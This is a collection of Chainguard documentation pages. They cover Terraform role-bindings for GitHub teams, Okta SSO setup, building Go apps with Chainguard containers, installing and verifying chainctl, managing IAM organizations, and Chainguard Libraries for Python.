Terraform helps to reduce the risk of unwanted users gaining access to Chainguard. This guide outlines one method of using Terraform to grant members of a GitHub team access to the resources managed by a Chainguard organization. It also highlights a few other Terraform configurations you can use to manage role-bindings in the Chainguard platform. Although this guide is specific to GitHub, the same approach can be used for other systems. Prerequisites To complete this guide, you will need the following. terraform installed on your local machine. 
Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. Access to a GitHub team. If you’d like, you can create a new GitHub organization and team for testing purposes. Check out GitHub’s documentation for details on how to do this. A GitHub Personal Access Token, with a minimum of read:org access. Follow GitHub’s documentation on the subject to learn how to set one up. Additionally, you will need to configure SSO for your personal access token if required by your organization. Setting up your Environment There are a few things you must have in place in order to follow this guide. First, create a testing directory to hold the Terraform configuration and navigate into it. mkdir ~/github-team && cd $_ This will help make it easier to clean up your system at the end of this guide. Next, you’ll need to set up a few environment variables that the Terraform configuration in this guide assumes you will have in place. Start by creating an environment variable named GITHUB_ORG that points to the name of your GitHub organization. Run the following command to create this variable, but be sure to replace <your GitHub organization> with the actual name of your organization as it appears in URLs. For example, if your organization owns a repository at the URL https://github.com/orgName-example/repository-name, then the value you would pass here would be orgName-example. export GITHUB_ORG=<your GitHub organization> Next, create a variable named GITHUB_TEAM set to the slug of the GitHub team for which you want to create a set of role-bindings. The Terraform configuration will use this detail to find and retrieve information about your GitHub team. If you aren’t sure of what your team’s slug is, you can find it with gh, the GitHub command line interface. You can use a command like the following to retrieve a list of all your organization’s teams. gh api -H "Accept: application/vnd.github+json" -H "X-GitHub-Api-Version: 2022-11-28" /orgs/$GITHUB_ORG/teams Scroll through this command’s output to find the slug value for the team in question. [ . . . { "name": "Team Name", "id": 9999999, "node_id": "T_kwDOBTYtm84AbTQX", "slug": "team-slug", . . . }, . . . ] With the team’s slug in hand, run the following command to create the GITHUB_TEAM environment variable. export GITHUB_TEAM=<your GitHub team slug> Following that, you will need to provide Terraform with your GitHub personal access token so it can access information related to your GitHub organization. Rather than hard coding your token into the Terraform configuration or having Terraform prompt you to enter it manually, you can create an environment variable named GITHUB_TOKEN which Terraform will automatically use. Create this variable with the following command. export GITHUB_TOKEN=<your GitHub token> Lastly, the Chainguard role-bindings that this guide’s Terraform configuration will create must all be tied to an organization. Create another variable named CHAINGUARD_ORG with the following command, replacing <UIDP of target Chainguard IAM organization> with the UIDP of the Chainguard IAM organization you want to tie the role-bindings to. You can find the UIDP for your Chainguard IAM organization by running chainctl iam organizations ls -o table. 
export CHAINGUARD_ORG="<UIDP of target Chainguard IAM organization>" Following that, you will have everything you need in place to set up the Terraform configuration. Creating your Terraform Configuration As mentioned previously, we will be using Terraform to create role-bindings for each user in a GitHub team, giving them access to resources associated with a given Chainguard organization. This guide outlines how to create two Terraform configuration files that, together, will produce a set of such role-bindings. To help explain both files’ purposes, we will go over what they do and how to create each one individually. main.tf First, we will create a main.tf file which will set up the necessary Terraform providers. This file will consist of the following lines. terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } github = { source = "integrations/github" } } } provider "github" { owner = "$GITHUB_ORG" } The terraform block defines the sources for the chainguard and github providers. The provider block sets up the github provider with one argument — owner — that points to the GITHUB_ORG variable you set previously. Create the main.tf file with the following command. cat <<EOF > main.tf terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } github = { source = "integrations/github" } } } provider "github" { owner = "$GITHUB_ORG" } EOF Next, you will create the other configuration file that will actually create the role-bindings for your GitHub team. rolebindings.tf The rolebindings.tf file will contain a few separate blocks that retrieve information about the GitHub team members and create Chainguard role-bindings for each one. The first block creates a github_team data source named team. data "github_team" "team" { slug = "$GITHUB_TEAM" } Using the arguments you provided in the github provider block in main.tf, Terraform will search for any GitHub teams matching the slug specified within this block. If Terraform can find a team with a matching slug in the specified GitHub organization, then you will be able to pull more data about this team down from GitHub. After the first block retrieves information about the team, we need to retrieve information about each member of the team in order to create an identity for each of them. To this end, the next block creates a github_user data source named team_members. data "github_user" "team_members" { for_each = toset(data.github_team.team.members) username = each.key } Because we want this source to represent every member of the team, this block starts with a for_each meta-argument which accepts a set of the GitHub team members (created with toset) derived from the github_team source created previously. Additionally, the github_user data source requires you to set the username argument to whichever user you want the data source to represent. In the Terraform language, each.key is the map key corresponding to the objects referenced in the for_each argument. In this case, it means the username variable will be tied to a mapping of each member of the GitHub team within this Terraform configuration. The next block retrieves Chainguard identities for each member of the GitHub team. data "chainguard_identity" "team_ids" { for_each = toset([for x in data.github_user.team_members : x.id]) issuer = "https://auth.chainguard.dev/" subject = "github|${each.key}" } This block’s for_each meta-argument iterates through each member of the team. 
For each iteration, it retrieves that user’s GitHub ID and then retrieves a Chainguard identity that it derives using that GitHub ID. If there are members of the GitHub team who have not yet registered with Chainguard, this method will still assign them the correct permissions when they log in for the first time. The next block retrieves the predefined viewer role from Chainguard. data "chainguard_role" "viewer" { name = "viewer" } The final block puts all this information together to create the role-bindings for each member of the team. resource "chainguard_rolebinding" "cg-binding" { for_each = data.chainguard_identity.team_ids identity = each.value.id group = "$CHAINGUARD_ORG" role = data.chainguard_role.viewer.items[0].id } This resource block iterates through the list of Chainguard identities, assigns each one to the IAM organization specified by the group argument, and binds each identity to the viewer role. Here, the group argument is set to the CHAINGUARD_ORG variable you created at the start of this guide. Create the rolebindings.tf file with the following command. cat <<EOF > rolebindings.tf data "github_team" "team" { slug = "$GITHUB_TEAM" } data "github_user" "team_members" { for_each = toset(data.github_team.team.members) username = each.key } data "chainguard_identity" "team_ids" { for_each = toset([for x in data.github_user.team_members : x.id]) issuer = "https://auth.chainguard.dev/" subject = "github|\${each.key}" } data "chainguard_role" "viewer" { name = "viewer" } resource "chainguard_rolebinding" "cg-binding" { for_each = data.chainguard_identity.team_ids identity = each.value.id group = "$CHAINGUARD_ORG" role = data.chainguard_role.viewer.items[0].id } EOF Note that the fourteenth line of this file contains a backslash (\). subject = "github|\${each.key}" This is an escape character which will prevent the dollar sign in that line from causing a bad substitution error. Now that your Terraform configuration is in place, you’re ready to apply it and create role-bindings for each member of your GitHub team. Applying your Terraform Configuration First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan If the plan worked successfully and you’re satisfied that it will produce the resources you expect, you can apply it. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. . . . Plan: 2 to add, 0 to change, 0 to destroy. Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After pressing ENTER, the command will complete. . . . Apply complete! Resources: 2 added, 0 changed, 0 destroyed. Following this, any members of your GitHub team for whom you’ve created role-bindings will be able to view the resources associated with the Chainguard organization you specified. To do so, they need to log in to the Chainguard platform, either by logging into the Chainguard Console or with the following command. chainctl auth login After navigating to the Console or running the login command, they will be presented with the following login flow. 
There, they must click the Continue with GitHub button to continue logging in under their GitHub account. Chainguard will immediately recognize their GitHub account because it is tied to the role-binding you created in the previous step, and they will be able to view the resources associated with the Chainguard organization specified in your Terraform configuration. Optional Configurations The Terraform configuration used in this guide is meant to serve as a starting point, and we encourage you to tweak and expand on it to suit your organization’s needs. This section contains a few alternative configurations that you may find useful. For example, rather than applying the viewer role to your team’s role-bindings, you can apply one of the other built-in roles, or any custom roles created within your Chainguard organization. The following data and resource block examples could be used in place of the ones used in this guide’s rolebindings.tf file. Instead of granting the identities the viewer role, this grants them the editor role. data "chainguard_roles" "editor" { name = "editor" } resource "chainguard_rolebinding" "cg-binding" { for_each = toset(data.chainguard_identity.team_ids) identity = each.value.id group = "$CHAINGUARD_ORG" role = data.chainguard_roles.editor.items[0].id } The Terraform configuration language is quite flexible. You can update your Terraform configuration to retrieve information about a single user, rather than an entire team. data "github_user" "user" { username = "$USERNAME" } Likewise, you can retrieve a GitHub user’s Chainguard identity without having to include the for_each meta-argument. data "chainguard_identity" "gh-user-chainguard-rb" { issuer = "https://auth.chainguard.dev/" subject = "github|${data.github_user.$USERNAME.id}" } You can refer to the Terraform language documentation for more information on extending the configuration outlined in this guide to suit your own needs. Removing Sample Resources To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy the Chainguard role-bindings created for your GitHub team. You can then remove the working directory to clean up your system. rm -r ~/github-team/ Following that, all of the example resources created in this guide will be removed from your system. Learn More The procedure outlined in this tutorial can be tweaked to work with other identity providers, including Google and GitLab. --- ### How To Integrate Okta SSO with Chainguard URL: https://edu.chainguard.dev/chainguard/administration/custom-idps/idp-providers/okta/ Last Modified: October 28, 2024 Tags: Chainguard Containers, Procedural The Chainguard platform supports Single sign-on (SSO) authentication for users. By default, users can log in with GitHub, GitLab and Google, but SSO support allows users to bring their own identity provider for authentication. This guide outlines how to create an Okta application and integrate it with Chainguard. After completing this guide, you’ll be able to log in to Chainguard using Okta and will no longer be limited to the default SSO options. Prerequisites To complete this guide, you will need the following. chainctl installed on your system. Follow our guide on How To Install chainctl if you don’t already have this installed. An Okta account over which you have administrative access. 
Create an Okta App integration To integrate your Okta identity provider with the Chainguard platform, log in to Okta and navigate to the Applications landing page in the Admin console. There, click the Create App Integration button. Select OIDC - OpenID Connect as the sign-in method and Web Application as the application type. Next, in the General Settings window, configure the application as follows. App integration name: Enter a descriptive name (like “Chainguard”) here. Logo: You can optionally add a Chainguard logo icon here to help your users visually identify this integration. If you’d like, you can use the icon from the Chainguard Console. Grant type: Ensure that the grant type is set to Authorization Code only. Warning: DO NOT select other grant types as this may compromise your security. Sign-in redirect URIs: Set the redirect URI to https://issuer.enforce.dev/oauth/callback Sign-out redirect URIs: This will have a URI field set to http://localhost:8080 by default. Click the X icon to remove the sign-out redirect entirely, leaving this field blank. Click the Save button. Then, select the Sign On tab. Find the OpenID Connect ID Token section and click the Edit button. Set the Issuer option to Okta URL, then click the Save button. That completes our configuration of the Okta Application. Next, we need to configure the Chainguard platform to use our Okta application. Configuring Chainguard to use Okta SSO Now that your Okta application is ready, you can create the custom identity provider. First, log in to Chainguard with chainctl, using an OIDC provider like Google, GitHub, or GitLab to bootstrap your account. chainctl auth login Note that this bootstrap account can serve as a backup account (that is, an account you can use to log in if you ever lose access to your primary account). However, if you prefer to remove this role-binding after configuring the custom IDP, you may also do so. To configure the platform, make a note of the following settings from your Okta Application: Client ID: You can find this on the General tab under Client Credentials Client Secret: Find this on the General tab under Client Credentials Issuer URL: This is found under the Sign On tab in the OpenID Connect ID Token section You will also need the UIDP for the Chainguard organization under which you want to install the identity provider. Your selection won’t affect how your users authenticate but will have implications for who has permission to modify the SSO configuration. You can retrieve a list of all Chainguard organizations you belong to — along with their UIDPs — with the following command. chainctl iam organizations ls -o table ID | NAME | DESCRIPTION --------------------------------------------------------+-------------+--------------------- 59156e77fb23e1e5ebcb1bd9c5edae471dd85c43 | sample_org | . . . | . . . | Note down the ID value for your chosen organization. With this information in hand, create a new identity provider with the following commands. export NAME=okta export CLIENT_ID=<your client id here> export CLIENT_SECRET=<your client secret here> export ISSUER=<your issuer url here> export ORG=<your organization UIDP here> chainctl iam identity-provider create \ --configuration-type=OIDC \ --oidc-client-id=${CLIENT_ID} \ --oidc-client-secret=${CLIENT_SECRET} \ --oidc-issuer=${ISSUER} \ --oidc-additional-scopes=email \ --oidc-additional-scopes=profile \ --parent=${ORG} \ --default-role=viewer \ --name=${NAME} Note the --default-role option. 
This defines the default role granted to users registering with this identity provider. This example specifies the viewer role, but depending on your needs you might choose editor or owner. If you don’t include this option, you’ll be prompted to specify the role interactively. For more information, refer to the IAM and Security section of our Introduction to Custom Identity Providers in Chainguard tutorial. You can refer to our Generic Integration Guide in our Introduction to Custom Identity Providers article for more information about the chainctl iam identity-provider create command and its required options. To log in to the Chainguard Console with the new identity provider you just created, navigate to console.chainguard.dev and click Use Your Identity Provider. Next, click Use Your Organization Name and enter the name of the organization associated with the new identity provider. Finally, click the Login with Provider button. This will open up a new window with the Okta login flow, allowing you to complete the login process through there. You can also use the custom identity provider to log in through chainctl. To do this, run the chainctl auth login command and add the --identity-provider option followed by the identity provider’s ID value: chainctl auth login --identity-provider <IDP-ID> The ID value appears in the ID column of the table returned by the chainctl iam identity-provider create command you ran previously. You can also retrieve this table at any time by running chainctl iam identity-provider ls -o table when logged in. --- ### Getting Started with the Go Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/go/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product The Go Chainguard Container is a container image suitable for building Go applications. The latest variant is a distroless image without a package manager, while the latest-dev variant offers additional building tools and the apk package manager. In this guide, we’ll demonstrate how to build and execute Go applications using Chainguard Containers, using three examples from our demos repository. In the first example, we’ll build a CLI application using a Docker multi-stage build. In the second example, we’ll build an application that’s accessible via an HTTP server, also using a Docker multi-stage build to obtain an optimized runtime image. The third example shows how to build an image using ko, a tool that enables you to build container images from Go programs and push them to container registries without requiring a Dockerfile. The examples in this guide recommend executing Go binaries from one of our runtime Chainguard Containers, such as the glibc-dynamic or static Chainguard Containers. That is possible because Go applications are compiled and the toolchain is not typically required in a runtime container image. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. 
Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Preparation This tutorial requires Docker to be installed on your local machine. If you don’t have Docker installed, you can download and install it from the official Docker website. The third and optional example requires the installation of ko, which you can install by following the instructions on the official site. Cloning the Demos Repository Start by cloning the demos repository to your local machine: git clone git@github.com:chainguard-dev/edu-images-demos.git Access the go folder in the repository: cd edu-images-demos/go Here you will find three folders, each with a different demo that we’ll cover in this guide. Example 1: CLI Application in Multi-Stage Build The following example demonstrates a command line application with support for flags and positional arguments. The application prints a modifiable greeting message and provides usage information if the wrong number of arguments are passed by a user or the user passes an unrecognized flag. Start by accessing the go-greeter folder in the demos repository: cd go-greeter For reference, here is the content of the Dockerfile for this demo:

FROM cgr.dev/chainguard/go AS builder
COPY . /app
RUN cd /app && go build -o go-greeter .
FROM cgr.dev/chainguard/static
COPY --from=builder /app/go-greeter /usr/bin/
ENTRYPOINT ["/usr/bin/go-greeter"]

This Dockerfile will: Start a build stage based on the go:latest container image and name it builder; Copy the application files to the /app directory in the image; Build the application in the /app directory; Start a new build stage based on the static:latest image; Copy the built application from the builder stage to the /usr/bin directory in the new image; Set the entrypoint to the built application. Run the following command to build the container image, tagging it go-greeter: docker build . --pull -t go-greeter You can now run the container image with: docker run go-greeter You should get output similar to the following: Hello, Linky 🐙! You can also pass in arguments that will be parsed by the Go CLI application: docker run go-greeter -g Greetings "Chainguard user" This will produce the following output: Greetings, Chainguard user! The application will also share usage instructions when prompted with the --help flag or when invalid flags are passed. Because we used the static Chainguard Container as our runtime, the final container image only requires a few megabytes on disk: docker inspect go-greeter | jq -c 'first' | jq .Size | numfmt --to iec --format "%8.4f" 3.3009M The final size, 3.3009M, is orders of magnitude smaller than it would be if we ran the application using a Go image as the runtime. However, if your application is dynamically linked to shared objects, consider using the glibc-dynamic Chainguard Container for your runtime or take extra steps to build your Go binary statically.
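One common extra step is to disable cgo so that the resulting binary does not link against a C library at all. As a minimal sketch, and assuming your application does not depend on cgo, you could set CGO_ENABLED=0 in the build command used by the builder stage shown earlier:
CGO_ENABLED=0 go build -o go-greeter .
With a fully static binary like this, the static Chainguard Container remains a suitable runtime image.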
In the next example, we’ll build a web application and use the glibc-dynamic Chainguard Container as runtime. Example 2: Web Application The second example demonstrates an application that’s accessible via an HTTP server. The application renders a simple message that changes based on the URI. Start by accessing the greet-server folder in the Go demos repository: cd greet-server For reference, here is the content of the Dockerfile for this demo:

FROM cgr.dev/chainguard/go AS builder
COPY . /app
RUN cd /app && go build
FROM cgr.dev/chainguard/glibc-dynamic
COPY --from=builder /app/greet-server /usr/bin/
EXPOSE 8080
ENTRYPOINT ["/usr/bin/greet-server"]

Use the following command to build the container image, tagging it greet-server: docker build . --pull -t greet-server Now you can run the container image with the following command: docker run -p 8080:8080 greet-server Visit http://0.0.0.0:8080/ using a web browser on your host machine. You should get a greeting message: Hello, Linky 🐙! Changes to the URI will be routed to the application. Try visiting http://0.0.0.0:8080/Chainguard%20Customer. You should see the following output: Hello, Chainguard Customer! The application will also share version information at http://0.0.0.0:8080/version. Example 3: Minimal Go Chainguard Container Built with ko In this example, we’ll build a distroless Go Chainguard Container with ko. ko offers fast container image builds for Go applications without requiring a Dockerfile. Additionally, ko produces SBOMs by default, supporting a holistic approach to software security. Start by accessing the go-digester folder in the Go demos repository: cd go-digester The go-digester demo uses the go-containerregistry library to print out the digest of the latest build of a Chainguard Container, using go as the default image to pull the digest from, and with an optional parameter to specify a different container image name. If you have Go installed locally, you can run the application with: go run main.go You should obtain output similar to this: The latest digest of the go Chainguard Container is sha256:86178b42db2e32763304e37f4cf3c6ec25b7bb83660dcb985ab603e3726a65a6 We’ll now use ko to build an image that is suitable to run the application defined in main.go. By default, ko uses the cgr.dev/chainguard/static image as the base image for the build. You can override this by setting the KO_DEFAULTBASEIMAGE environment variable to a different base image. Before building the container image, you’ll need to set up the environment variable KO_DOCKER_REPO. This environment variable identifies where ko should push images that it builds. This is usually a remote registry like the GitHub Container Registry or Docker Hub, but you can publish to your local machine for testing and demonstration purposes. Run the following command to set the KO_DOCKER_REPO environment variable to your local machine: export KO_DOCKER_REPO=ko.local Next, ensuring that you are in the same directory as your main.go file, run the following command to build the container with ko: ko build . Once you run this command, you’ll receive output similar to the following. 2024/12/06 13:03:14 Using base cgr.dev/chainguard/static:latest@sha256:5ff428f8a48241b93a4174dbbc135a4ffb2381a9e10bdbbc5b9db145645886d5 for go-digester 2024/12/06 13:03:15 git doesn't contain any tags. Tag info will not be available 2024/12/06 13:03:15 Building go-digester for linux/amd64 2024/12/06 13:03:20 Loading ko.local/go-digester-edc0ed689c7fb820a565f76425bed013:0914a85d803988ab10964323c0cd7b4bf89aed2603f6e8e276f798491c731336 2024/12/06 13:03:20 Loaded ko.local/go-digester-edc0ed689c7fb820a565f76425bed013:0914a85d803988ab10964323c0cd7b4bf89aed2603f6e8e276f798491c731336 2024/12/06 13:03:20 Adding tag latest 2024/12/06 13:03:20 Added tag latest ko.local/go-digester-edc0ed689c7fb820a565f76425bed013:0914a85d803988ab10964323c0cd7b4bf89aed2603f6e8e276f798491c731336 At this point, your container is built. 
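If you would rather not copy and paste the long image reference by hand, note that ko build prints that reference to standard output, so you can capture it directly in a single step. This is a small convenience sketch rather than part of the demo itself.
docker run --rm "$(ko build .)"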
Because the output of ko build is an image reference, you can pass it to other tools like Docker. You can learn more about deployment with ko and Kubernetes integration by reading the respective documentation on the official site. We’ll demonstrate running the container built above with Docker. Note: To follow along, be sure that you copy and paste the last line of output from your last command, which begins with ko.local/go-digester-... docker run --rm ko.local/go-digester-edc0ed689c7fb820a565f76425bed013:0914a85d803988ab10964323c0cd7b4bf89aed2603f6e8e276f798491c731336 Here, you should receive the same output as before, showing the digest of the Go container. The latest digest of the go Chainguard Container is sha256:86178b42db2e32763304e37f4cf3c6ec25b7bb83660dcb985ab603e3726a65a6 You can also pass in an optional argument to specify which Chainguard Container to pull the latest digest from: docker run --rm ko.local/go-digester-edc0ed689c7fb820a565f76425bed013:0914a85d803988ab10964323c0cd7b4bf89aed2603f6e8e276f798491c731336 mariadb The latest digest of the mariadb Chainguard Container is sha256:6ba5d792d463b69f93e8d99541384d11b0f9b274e93efdeb91497f8f0aae03d1 Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose Go Chainguard Container, you'll first need to check if the package you want is already available in the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk add, you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as the base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### How to Install chainctl URL: https://edu.chainguard.dev/chainguard/chainctl-usage/how-to-install-chainctl/ Last Modified: June 24, 2024 Tags: chainctl, Product The Chainguard command line interface (CLI) tool, chainctl, will help you interact with the account model that Chainguard provides, and enable you to make queries into the state of your Chainguard resources. The tool uses the familiar <context> <noun> <verb> style of CLI interactions. For example, to retrieve a list of all the private Chainguard Containers available to your organization, you can run chainctl images list. Before we begin, let’s move into a temporary directory that we can work in. Be sure you have curl installed, which you can do by visiting the curl download docs for your operating system. mkdir ~/tmp && cd $_ There are currently two ways to install chainctl, depending on your operating system and preferences. Install chainctl with Homebrew You can install chainctl for macOS and Linux with the package manager Homebrew. Note that you will need to have the Xcode Command Line Tools installed prior to installing chainctl with Homebrew on macOS. Without these installed, you won’t be able to use Homebrew to install chainctl on your macOS device. If you haven’t already done so, you can install the Xcode Command Line Tools with the following command. xcode-select --install Before installing chainctl with Homebrew, use brew tap to bring in Chainguard’s repositories. 
brew tap chainguard-dev/tap Next, install chainctl with Homebrew. brew install chainctl You are now ready to use the chainctl command. You can verify that it works correctly in the final section of this guide. Install with curl A platform-agnostic approach to installing chainctl is to use curl. We have specific instructions for Windows users on installing chainctl with curl, but all others can run the following command: curl -o chainctl "https://dl.enforce.dev/chainctl/latest/chainctl_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m | sed 's/aarch64/arm64/')" Move chainctl into your /usr/local/bin directory and elevate its permissions so that it can execute as needed. sudo install -o $UID -g $(id -g) -m 0755 chainctl /usr/local/bin/ At this point, you’ll be able to use the chainctl command. Installing with curl in Windows PowerShell As stated previously, you can also use curl to install chainctl on Windows systems. Running the following command in PowerShell will download the appropriate .exe file. curl -o chainctl.exe https://dl.enforce.dev/chainctl/latest/chainctl_windows_x86_64.exe It may take several minutes for this operation to complete. Following that, you can use chainctl. Be aware that Windows PowerShell does not load commands from the working directory by default, so you will need to include .\ before any chainctl commands you run, as in this example. .\chainctl auth login Also, please note that while chainctl commands will generally work, some are not as thoroughly tested on Windows and may not behave as expected. In particular, the chainctl auth configure-docker command is known to cause errors on Windows as of this writing. Verify installation You can verify that everything was set up correctly by checking the chainctl version. chainctl version You should receive output similar to the following. ____ _ _ _ ___ _ _ ____ _____ _ / ___| | | | | / \ |_ _| | \ | | / ___| |_ _| | | | | | |_| | / _ \ | | | \| | | | | | | | | |___ | _ | / ___ \ | | | |\ | | |___ | | | |___ \____| |_| |_| /_/ \_\ |___| |_| \_| \____| |_| |_____| chainctl: Chainguard Control GitVersion: <semver version> GitCommit: <commit hash> GitTreeState: clean BuildDate: <date here> GoVersion: <compiler version> Compiler: gc Platform: <your platform> If you received output that you did not expect, check your bash profile to make sure that your system is using the expected PATH. Verifying the chainctl binary with Cosign You can verify the integrity of your chainctl binary using Cosign. Ensure that you have the latest version of Cosign installed by following our How to Install Cosign guide. Verify your chainctl binary with the following command: VERSION=$(chainctl version 2>&1 | awk '/GitVersion/ {print $2}' | sed 's/^v//') cosign verify-blob \ --signature "https://dl.enforce.dev/chainctl/${VERSION}/chainctl_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m).sig" \ --certificate "https://dl.enforce.dev/chainctl/${VERSION}/chainctl_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m).cert.pem" \ --certificate-identity "https://github.com/chainguard-dev/mono/.github/workflows/.release-drop.yaml@refs/tags/v${VERSION}" \ --certificate-oidc-issuer https://token.actions.githubusercontent.com \ $(which chainctl) You should receive the following output: Verified OK If you do not see the line Verified OK then there is a problem with your chainctl binary and you should reinstall it using the instructions at the beginning of this page. 
Authenticating With chainctl installed, you can authenticate into Chainguard with the following command: chainctl auth login This will open your browser window and take you through a workflow to log in with your OIDC provider. Configure a Docker credential helper You can configure a Docker credential helper with chainctl by running: chainctl auth configure-docker This will update your Docker config file to call chainctl when an auth token is needed. A browser window will open when the token needs to be refreshed. For guidance on pull tokens, please review authenticating with a pull token. Updating chainctl When your version of chainctl is a few weeks old or older, consider updating it to make sure that you are using the most up-to-date version. You can update chainctl by running the update command. sudo chainctl update --- ### How to Manage Chainguard IAM Organizations URL: https://edu.chainguard.dev/chainguard/administration/iam-organizations/how-to-manage-iam-organizations-in-chainguard/ Last Modified: April 3, 2024 Tags: Product, Procedural Chainguard provides a rich Identity and Access Management (IAM) model similar to those used by AWS and GCP. This guide outlines how to manage Chainguard’s IAM structures with the chainctl command line tool. Note: You should work with Chainguard’s Customer Success team to create or delete organizations. This will help to ensure that no users lose access to resources and that your IAM structure is configured correctly. Logging in To authenticate into the Chainguard platform, run the following login command. chainctl auth login A web browser window will open to prompt you to log in via your chosen OIDC flow. Select an account with which you wish to register. Once authenticated, you can set up an organization. Listing Organizations At any time, you can list the organizations your account has access to by using the list subcommand. To make the output more human-readable, you can display the information as a table by passing -o table at the end of the command. chainctl iam organizations list You’ll get output regarding each of the organizations the user you’re logged in as belongs to, including a description of each organization, if available. [demo-org] This is a shared IAM organization for running demos [tutorial-org] This is a shared IAM organization for tutorials. You can retrieve your organizations’ UIDPs by adding the -o table option to the previous list command. chainctl iam organizations list -o table ID | NAME | DESCRIPTION ----------------------+--------------+--------------------------------- <Organization UIDP> | tutorial-org | This is a shared IAM | | organization for tutorials. <Organization UIDP> | demo-org | This is a shared IAM | | organization for running demos Some other chainctl functions require you to know an organization’s UIDP, making this a useful option to remember. Inviting Others to an Organization You can use chainctl to generate invite codes in order to invite others to a specific organization. To do so, run the following command, making sure to replace $ORGANIZATION with the name of your chosen organization. chainctl iam invite create $ORGANIZATION You will be prompted to select the scope that the invite code will grant. After selecting the role-bindings, this command will generate both an invite code and an invite link. 
If you ever lose the invite code, you can retrieve a list of active invite codes with the following chainctl command: chainctl iam invite list This will provide output in the form of a table with the organization ID, a timestamp indicating when the invitation to the organization will expire, the invite code’s key ID, and the selected role. ID | EXPIRATION | KEYID | ROLE ----------------------+--------------------------+---------------+--------------------------------- <Organization UIDP> | 2024-03-23T00:55:04.813Z | <Invite code> | [editor] Editor Note that the invite code found under the KEYID column will be shorter than the one returned in the output of the chainctl iam invite create command, but they are effectively the same. To invite team members, auditors, or others to your desired organizations, securely distribute the invite code and have them log in with chainctl as follows. chainctl auth login --invite-code $INVITE_CODE You can also securely distribute the invite link and have users open it in their web browser to log in and join the organization. Note that you can tighten the scope of an invite code by including the --email and --ttl flags when creating the invite. chainctl iam invite create $ORGANIZATION --email linky@example.com --ttl 24h In this example, the invitation is scoped to a user with the email address linky@example.com. If someone with a different email address tries to use the code, it will not work. The --ttl option in this example means that the code will expire in 24 hours. Learn more In addition to inviting other users to your organization, you can set up assumable identities to allow automation systems — like Buildkite or GitHub Actions — to perform certain administrative tasks for your organization. To learn more, we encourage you to check out our Overview of Assumable Identities as well as our collection of Assumable Identity Examples. You may also be interested in setting up a Custom Identity Provider for your organization. By default, users can log in with GitHub, GitLab, and Google, but a Custom IDP can allow members of your organization to log in to Chainguard with a corporate identity provider like Okta, Microsoft Entra ID, or Ping Identity. --- ### Chainguard Libraries for Python Overview URL: https://edu.chainguard.dev/chainguard/libraries/python/overview/ Last Modified: January 1, 0001 Tags: Chainguard Libraries, Python, Overview Introduction Python is one of the most popular programming languages in the world. The open Python Package Index (PyPI) contains over 600,000 libraries for application development, machine learning, data science, and many other use cases. Chainguard Libraries for Python rebuilds these powerful open source projects within the Chainguard Factory, enabling access to the Python ecosystem while dramatically reducing risk from an untrusted software supply chain. Chainguard Libraries for Python enables access to a growing collection of Python packages rebuilt from source. New releases of common libraries or artifacts requested by customers are added to the index by an automated system. Any request for a library or library version missing in Chainguard Libraries automatically triggers a process to provision the artifacts from relevant sources if available. In combination with third-party software repository managers, you can use Chainguard Libraries for Python as a secure source of truth for your development process.
Runtime requirements The runtime requirements for Python artifacts available from Chainguard Libraries for Python are identical to the requirements of the original upstream project. For example, if a Python wheel retrieved from PyPI requires Python 3.10 or higher, the same Python 3.10 runtime requirement applies to the binary artifact from Chainguard Libraries for Python. Some Python libraries include Python extensions that depend on native binaries supplied by the operating system or included in the distribution archive. For these libraries, the following requirements apply: All Linux distributions must use glibc 2.28 or higher, such as RHEL 8, Ubuntu 20.04, or Amazon Linux 2023. On Windows and macOS you must use a suitable Linux distribution with a container solution, such as WSL2, apple/container, or Docker Desktop. The processor architecture of the runtime environment must be x86_64 or aarch64. Technical details Most organizations consume Chainguard Libraries for Python through a repository manager such as Cloudsmith, JFrog Artifactory, or Sonatype Nexus Repository. For full details, refer to our Global Configuration documentation. The rest of this article provides details of the underlying implementation of Chainguard Libraries for Python and how to access individual libraries manually. The Chainguard Libraries for Python index uses the PyPI repository format and only includes release artifacts of the libraries built by Chainguard from source. The URL for the repository is: https://libraries.cgr.dev/python/ Use the URL with your username and password retrieved with chainctl to access the Chainguard Libraries for Python repository manually with a browser. After successful login, you are redirected to the simple sub-context at https://libraries.cgr.dev/python/simple/ that allows you to inspect the available packages. The top level contains an alphabetical list of packages: 2captcha-python 3d-converter absql ahrs amqpstorm annogesic apiflask apscheduler ... A list of all wheels and tarballs for the versions of a specific package is available in the context of the package. For example, the apiflask context at https://libraries.cgr.dev/python/simple/apiflask/ shows the following list: Links for apiflask apiflask-0.1.0-py3-none-any.whl apiflask-0.1.0.tar.gz apiflask-0.10.0-py3-none-any.whl apiflask-0.10.0.tar.gz apiflask-0.10.1-py3-none-any.whl apiflask-0.10.1.tar.gz apiflask-0.11.0-py3-none-any.whl apiflask-0.11.0.tar.gz apiflask-0.12.0-py3-none-any.whl 